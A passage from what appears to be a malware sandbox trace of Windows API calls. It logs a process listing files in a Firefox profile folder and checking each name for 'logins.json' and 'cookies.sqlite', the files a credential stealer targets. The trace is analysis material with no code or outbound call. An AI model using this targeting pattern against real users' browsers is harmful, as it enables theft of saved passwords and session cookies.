returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.093] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.093] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.093] lstrlenW (lpString="pluginreg.dat") returned 13 [0161.093] GetProcessHeap () returned 0x8e0000 [0161.093] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.093] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.093] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="pluginreg.dat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" [0161.093] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.093] GetProcessHeap () returned 0x8e0000 [0161.093] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.093] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat", lpSrch="logins.json") returned 0x0 [0161.093] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat", lpSrch="cookies.sqlite") returned 0x0 [0161.093] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.093] GetProcessHeap () returned 0x8e0000 [0161.093] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.093] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84c85c10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x853f60d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x12069be0, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0xfde, dwReserved0=0x0, dwReserved1=0x0, cFileName="prefs.js", cAlternateFileName="")) returned 1 [0161.093] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.093] lstrlenW (lpString="\\") returned 1 [0161.093] GetProcessHeap () returned 0x8e0000 [0161.093] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.094] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.094] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.094] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.094] lstrlenW (lpString="prefs.js") returned 8 [0161.094] GetProcessHeap () returned 0x8e0000 [0161.094] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x9254f8 [0161.094] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.094] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="prefs.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" [0161.094] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.094] GetProcessHeap () returned 0x8e0000 [0161.094] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.094] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js", lpSrch="logins.json") returned 0x0 [0161.094] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js", lpSrch="cookies.sqlite") returned 0x0 [0161.094] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.094] GetProcessHeap () returned 0x8e0000 [0161.094] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.094] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb6fa8c70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb6fa8c70, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb6fa8c70, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x4183, dwReserved0=0x0, dwReserved1=0x0, cFileName="search.json", cAlternateFileName="SEARCH~1.JSO")) returned 1 [0161.094] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.094] lstrlenW (lpString="\\") returned 1 [0161.094] GetProcessHeap () returned 0x8e0000 [0161.094] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.094] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.094] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.094] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.094] lstrlenW (lpString="search.json") returned 11 [0161.094] GetProcessHeap () returned 0x8e0000 [0161.094] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x9254f8 [0161.094] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.094] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="search.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" [0161.094] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.094] GetProcessHeap () returned 0x8e0000 [0161.094] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.094] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json", lpSrch="logins.json") returned 0x0 [0161.094] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json", lpSrch="cookies.sqlite") returned 0x0 [0161.095] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.095] GetProcessHeap () returned 0x8e0000 [0161.095] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.095] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb477d930, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb477d930, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb47c9bf0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="secmod.db", cAlternateFileName="")) returned 1 [0161.095] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.095] lstrlenW (lpString="\\") returned 1 [0161.095] GetProcessHeap () returned 0x8e0000 [0161.095] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.095] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.095] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.095] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.095] lstrlenW (lpString="secmod.db") returned 9 [0161.095] GetProcessHeap () returned 0x8e0000 [0161.095] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x9254f8 [0161.095] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.095] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="secmod.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" [0161.095] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.095] GetProcessHeap () returned 0x8e0000 [0161.095] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.095] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db", lpSrch="logins.json") returned 0x0 [0161.095] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db", lpSrch="cookies.sqlite") returned 0x0 [0161.095] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.095] GetProcessHeap () returned 0x8e0000 [0161.095] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.095] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb82fff30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc3787480, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3787480, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x3d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="sessionstore.bak", cAlternateFileName="SESSIO~1.BAK")) returned 1 [0161.095] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.095] lstrlenW (lpString="\\") returned 1 [0161.095] GetProcessHeap () returned 0x8e0000 [0161.095] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.095] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.095] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.095] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.095] lstrlenW (lpString="sessionstore.bak") returned 16 [0161.095] GetProcessHeap () returned 0x8e0000 [0161.096] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x9254f8 [0161.096] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.096] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="sessionstore.bak" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" [0161.096] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.096] GetProcessHeap () returned 0x8e0000 [0161.096] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.096] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak", lpSrch="logins.json") returned 0x0 [0161.096] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak", lpSrch="cookies.sqlite") returned 0x0 [0161.096] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.096] GetProcessHeap () returned 0x8e0000 [0161.096] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.096] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb82fff30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x84e029d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x84e029d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xbc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="sessionstore.js", cAlternateFileName="SESSIO~1.JS")) returned 1 [0161.096] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.096] lstrlenW (lpString="\\") returned 1 [0161.096] GetProcessHeap () returned 0x8e0000 [0161.096] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.096] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.096] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.096] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.096] lstrlenW (lpString="sessionstore.js") returned 15 [0161.096] GetProcessHeap () returned 0x8e0000 [0161.096] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fce90 [0161.096] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.096] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="sessionstore.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" [0161.096] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.096] GetProcessHeap () returned 0x8e0000 [0161.096] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.096] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js", lpSrch="logins.json") returned 0x0 [0161.096] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js", lpSrch="cookies.sqlite") returned 0x0 [0161.096] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.096] GetProcessHeap () returned 0x8e0000 [0161.096] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.096] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb6f36850, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x50000, dwReserved0=0x0, dwReserved1=0x0, cFileName="signons.sqlite", cAlternateFileName="SIGNON~1.SQL")) returned 1 [0161.097] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.097] lstrlenW (lpString="\\") returned 1 [0161.097] GetProcessHeap () returned 0x8e0000 [0161.097] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.097] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.097] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.097] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.097] lstrlenW (lpString="signons.sqlite") returned 14 [0161.097] GetProcessHeap () returned 0x8e0000 [0161.097] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.097] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS 